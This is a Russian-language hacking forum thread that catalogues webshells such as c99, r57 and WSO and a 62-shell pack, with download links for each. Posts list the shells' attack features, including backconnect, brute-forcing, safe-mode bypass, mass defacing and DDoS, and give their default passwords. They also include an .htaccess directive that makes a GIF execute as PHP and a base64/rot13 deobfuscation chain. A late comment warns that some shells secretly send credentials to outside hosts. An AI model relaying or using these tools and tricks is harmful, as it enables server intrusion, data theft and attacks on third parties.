Antichat shell Шелл от Российских программистов Grinay Go0o$E и Isis. Функции: [~] Выполнение комманд [~] Файл-менеджер [~] MD5-ломалка [~] Mysql dumper [~] PHP eval() Скачать: http://www.sendspace.com/file/zcjgly C99 Shell Один из самых популярных вебшеллов. Функции: [~] Выполнение комманд [~] Файл-менеджер [~] Онлайн encoder\decoder [~] Bidshell\Backconnect [~] PHP eval() [~] FTP Bruteforce [~] SQL Manager Скачать: http://www.sendspace.com/file/v4fbz5 CIH.[ms] Webshell Симпатичный шелл от российской комманды CIH.[ms] ! Функции: [~] Выполнение комманд [~] PHP eval() [~] File-Manager[/color] [~] SQL Manager Скачать: http://www.sendspace.com/file/0toeda MySQL Webshell MySQL Shell с достаточно непривычным интерфейсом. Радует небольшой размер скрипта. Скачать: http://www.sendspace.com/file/ldo7ee Loader'z WEB shell Шелл от Pro-Hack.ru. Функции: [~] Выполнение комманд [~] Файл-менеджер [~] Bidshell\Backconnect Скачать: http://www.sendspace.com/file/sp7bm1 R57Shell (1.4.0 & 1.4.2) Легендарный вебшелл, который не нуждается в представлении =) Функции: [~] Выполнение комманд [~] Файл-менеджер [~] Обход Safe Mode [~] Онлайн encoder\decoder [~] Bidshell\Backconnect [~] PHP eval() [~] FTP Bruteforce [~] Поиск и шаблоны важных команд [~] SQL Exec [~] Mail [~] Dos Скачать (1.4.0): http://www.sendspace.com/file/68mg47 Скачать (1.4.2): http://www.sendspace.com/file/fgms3n Скачать (ly0kha edition): http://www.sendspace.com/file/8ebpsz Remview (Fixed by Art Of Hack) Шелл с очень красивым и удобным интерфейсом! В этой версии исправены некоторые баги, а так же добавлена полная совместимость с новыми версиями PHP. Функции: [~] Выполнение комманд [~] Файл-менеджер [~] PHP eval() [~] MD5 Cracker [~] Online encoder\decoder Скачать: http://www.sendspace.com/file/oycc4k R57Sql 2.01 (Modified by ArtOfHack) Новая версия очень удобного SQL-менеджера, с приятным и понятным интерфейсом, напоминающим PHPMyAdmin. Скрипт сочетает в себе небольшой размер и отличный функционал. Но к большому сожалению обновления не выходили уже несколько лет, и из-за этого скрипт перестал рабоать на новых версиях PHP. Эта версия полностью совместима с новыми версиями PHP. Так же были исправлены несколько багов. Скачать: http://www.sendspace.com/file/pm2bzw WSO2.4 Webshell Отличный шелл от российских разработчиков. Функции: [~] Выполнение комманд [~] Файл-менеджер [~] Обход Safe Mode [~] PHP eval() [~] FTP Bruteforce [~] Поиск и шаблоны важных команд [~] SQL Manager password:root Скачать: http://www.sendspace.com/file/gyi0yf PPS 1.0 perl-cgi web shell Шел от Pashkela Функции: [~] Авторизация [~] SystemInfo [~] Листинг, загрузка, скачка, выполнение команд,просмотр файлов, редактирование файлов, chmod+touch+zip+unzip+delete папок/файлов в один клик [~] Консоль [~] phpMyAdmin на perl - пока только MySql (возможность отмечать несколько колонок для запроса) [~] Бекконект [~] Выполнение perl-кода из формы (eval) [~] Logout [~] Самоудаление [~] Работа через POST Default password: root Скачать: http://www.sendspace.com/file/cdlkqc [Python]CGI shell Автор шела oRb Функции: [~] работа с файлами и папками [~] выполнение команд [~] Bind port to /bin/sh [~] Back-connect [~] работают без создания каких-либо файлов в /tmp за счет fork'a Default password: root Скачать: http://www.sendspace.com/file/065345 MySQL RST/GHC Manager 2.3 Мод известного SQL-мэнеджера от участников antichat.ru Скачать: http://www.sendspace.com/file/q1s4cb rgod`s webshell Шелл от rgod. Скрипт обладает огромным функционалом, хоть и написан достаточно давно, о сих пор актуален. Для тех кто не в курсе rgod - известный итальянский хакер, нашедший огромное количество уязвимостей в различных PHP движках. rgod скончался в 2008 году от редкой болезни. Вечная память. Скачать: http://www.sendspace.com/file/fpyrt6 b0ff Web Shell 1.0 Переделанный WSO. Особых отличий я не заметил. Password: boff Скачать: http://www.sendspace.com/file/q6jr17 ZanDoboY Private Shell 1.5 06.2010 Скачать: http://www.sendspace.com/file/o37dkp
P.A.S. v.2.0 Web-Shell написанный на PHP с нуля. Функции: Файловый менеджер: [~] Удаление/перемещение/переименование/копирование/создание/скачка файлов и папок; [~] Загрузка файлов; [~] Просмотр и правка файлов; [~] Поиск с опциями и использованием preg_match; [~] Сортировка списка файлов; Выполнение команд: [~] Eval; [~] Exec ( с попыткой использования альтернатив при отключении ); MySQL менеджер: [~] Просмотр списка БД и таблиц; [~] Корректный просмотр содержимого таблиц; [~] Дамп/очистка/удаление БД и таблиц (любых размеров); [~] Выполнение запросов с отображением результатов; Информация о сервере: [~] PHPInfo; [~] Настройки Apach; [~] hosts (win); [~] sam (win); Процессы: [~] Просмотр; [~] Возможность попытки завершить процесс; Утилиты: [~] FTP чекер; [~] FTP брутер (по словарю/грубый, сохранение/отправка результатов на мыло); [~] MySQL брутер (по словарю/грубый, сохранение/отправка результатов на мыло); [~] Hash брутер (любой алгоритм, по словарю/грубый, сохранение/отправка результатов на мыло); [~] Отправка почты; [+] обход safe-mode; [+] поддержка MSSQL и PostgreSQL; [+] чекер Mail и Proxy; [+] брут MSSQL, PostgreSQL, Mail (POP3) сразу списком; [+] Perl Back-connect/Bind Port; [+] шифрование шелла, для c00kie авторизации, по указанному логину и паролю (без использования eval); [-] процессы; Login:admin; password:admin Инфо: Скрипт распространяется по лицензии "Beerware". Не использует JS, GET. Никаких картинок. Basic авотризация. Размер : 20 KB Скачать: http://www.sendspace.com/file/dqdcx5 Shell c102, RooT CraCkeR Скачать: http://www.sendspace.com/file/e3bj9c shell in gif В .htaccess нужно будет внести следующее: AddType application/x-httpd-php .gif Скачать: http://www.sendspace.com/file/wcnzte SyRiAn Sh3ll V2 user:root;password:toor Скачать: http://www.sendspace.com/file/gga90o Пак на 62 шелла Список: 1. Ajax Command Shell 2. Antichat Shell v1.3 3. Arab Shell 4. Aspx Shell 5. Avent Group 6. Ayyildiz Tim Shell 7. aZRaiL Php v1.0 8. b64 Shell 9. Backdoor v1.0 10. Backdoor by z0mbie 11. BackDoor FR 12. c99 Shell 13. c100 Shell 14. Cyber Shell (v 1.0) 15. datacha0s Shell 16. dC3 Security Crew Shell PRiV 17. Dive Shell 1.0 - Emperor Hacking Team 18. Dive Shell 19. Doom Tool v2.0 20. Dtool Pro 21. Dx Shell v1.0 22. ekin0x 23. Elmali Seker Backd00r 24. Erne Shell 25. Fatal Shell 26. GFS web-shell ver 3.1.7 - PRiV8 27. Hantu Shell 28. Heykir Shell 29. Infektion Shell 30. Iron Shell 31. Jsp Webshell 1.2 32. Kadot Universal Shell v0.1.6 33. Lama Shell 34. Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit 35. Macker's Private PHPShell 36. Mysql interface v1.0 37. MySQL Web Interface Version 0.8 38. n3t Shell 39. NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version 40. Onboom Shell 41. Perl Web Shell by RST-GHC 42. PhP Injection Shell 43. Php Shell 44. Private-i3lue 45. s72 Shell v1.1 Coding 46. safe0ver Shell 47. Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 48. SimAttacker - Vrsion 1.0.0 - priv8 4 My Friend 49. SimShell 1.0 - Simorgh Security MGZ 50. Sniper Shell 51. Ver Shell 52. Web Admin Shell 53. Web Shell 54. WinX Shell 55. c99 Cybernetic Edition 56. Worse Linux Shell 57. Grot Php Shell v1.2 58. c99_locus7s 59. Crystal Shell 60. Efso2.asp 61. r57 62. Safeover Shell Скачать: http://www.sendspace.com/file/mb5g2h Скачать одним архивом: http://www.sendspace.com/file/wd1zp0 (c) материалы предоставлены artofhack.kz & r00tsecurity.org
ITSecTeam Shell v2.1 This shell is developed by ITSecTeam members and it can: execute system commands execute bypass command bypass directory connect to common databases like MsSQL, MsSQL, PostgreSQL, Oracle & DB2 edit files & directories and new version features: Adding server informaton, php version and safe mode to the top of the shell page for ease of use. System drives listing. Adding icons to files and folders. Opening files with direct link. Downloading all of the files and folders of a special folder in zip format without using a specific function. Direct downloading a file. Maintaining working directory to use of whole site features. Adding symlink in 2 ways: using os command line and php abilities. Changing string to other formats. Mail Boomber. Local Crashing of php and apache. Dumping databse into sql and gzip format. Mass defacing of all folders with write access permission. Downloading a file from other servers. Performing remote DDoS attack. Searching for all writable folders. Bypass symlink and Mod security via htaccess and disabling safe mode and disable functions via php.ini if server configured unsuitable. Remonving shell automatically. Copying a file without using copy function. Changing of shell template. Removing bugs of former versions. Adding event of last activities. Disabling magic qoute in runtime. and so much more... Скачать: Download ver 2.1 Download former ver (1.1) Если уже запостили,удалите
XSS Tunnel Особая прокся, которая позволяет пустить весь HTTP-трафик через Cross-site Scripting (XSS) канал, открытый с помощью XSS-шелла. В архиве представлены как раз последние версии XSS Shell и XSS Tunnel, а также их исходники. Скачать: http://www.sendspace.com/file/m06iuo
WSO Krist_ALL edition Модификация известного шелла WSO. Автор модификации Krist_ALL решил добавить в шелл большой список функций и изменений, которых ему не хватало в оригинале: удаленная загрузка с сервера [если нет downloader'ов, то поле не показывается вообще, если же есть, то в списке только те, которые присутствуют на сервере] цвет надписей зависит от текущих прав [зеленый - writable, красный - нет прав] теперь всегда перед глазами полезности, опасности и прочая нужная информация [нет необходимости лезть в раздел INFO] поиск эксплойтов на множестве сайтов в списке появилась возможность редактирования файла [выбираем один единственный файл и жмем кнопку] порядок столбцов изменен на более удобный дополнительная информация в разделе INFO каждый параметр с новой строчки автоматически подсвечивается php-код, если ты просматриваешь файл с расширением php убран неработающий milw0rm изменен дизайн добавлена переменная $t [1 - показывает поле авторизации, 2 - не показывает] другие мелкие исправления и дополнения Пароль по умолчанию: root Скачать: http://dl.dropbox.com/u/20490401/WSO-Krist_ALL.rar
googlecode.com(Коллекция шеллов) http://web-malware-collection.googlecode.com/svn-history/r7/trunk/Backdoors/
404 Private shell By Team ap3x_nd_h4ck0 Нашел в gooooogle! _http://www.google.com.ua/search?q=404+Private+shell+By+Team+ap3x_nd_h4ck0 Для преобразования в адекватный вид нужно: eval(gzinflate(str_rot13(base64_decode _http://www.tareeinternet.com/scripts/decrypt.php
За баян не ругайте сильно. Вот накопал https://github.com/tennc/webshell . Искал b374 mini, накопал склад шеллов.
С этими шелами с гитхаба надо быть осторожнее.. Пару раз было такое: качаешь шелл, меняешь пароль и заливаешь его на сервер, заходишь на шелл, а он, помимо всего прочего, шлет ip сервера и пароль (хеш) на какой то китайский IP. или тоже, но через JS с клиента. Так что мой, совет - проверяйте шелы прежде чем использовать.
Буду иметь ввиду. Согласен. Халява имеет свою цену. Если чуть оффтопить, то надежное ПО - которое написал сам. Конечно из-за неопытности можно написать палево самому себе. Но вот вопрос возникал, ладно ПХП шеллы, они хоть как то читабельны. А если на компилируем языке написан чужой софт, там же при реверс ижениринге сам рогатый ногу сломит. Спецурам достаточно подослать на портал хоть одного своего програмера и все скачавшие его софт окажутся под колпаком.
Тот же WSO на aspx https://github.com/Pashkela/K-Shell_by_kikicoco_VHS_version_1.2_edition/blob/master/wso.aspx
Давно тут не был. Что с сайтом Маднэта случилось? p.S>Его шелл помните? Не заметил упоминаний в этом посте. Может кто нибудь выложит?
